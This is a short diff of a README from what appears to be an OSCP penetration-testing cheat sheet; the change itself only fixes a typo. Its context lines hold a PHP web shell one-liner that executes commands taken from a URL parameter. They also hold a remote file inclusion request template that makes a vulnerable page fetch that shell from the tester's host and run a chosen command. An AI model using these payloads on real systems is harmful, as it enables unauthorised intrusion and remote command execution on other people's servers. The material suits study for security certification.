pharo-sec/OSCP-Cheat-Sheet/README.md

 <code>ge?php echo shell_exec($_GET['cmd']); ?\le</code>

-Store in a file on local host, navigate to it via the wb app and pass commands to it.
+Store in a file on local host, navigate to it via the web app and pass commands to it.

 <code>http://[VULN_IP]/[VULN_PAGE]?[VULN_PARAMETER]=http://[LOCAL_IP]/rfi.txt&cmd=[COMMAND]</code>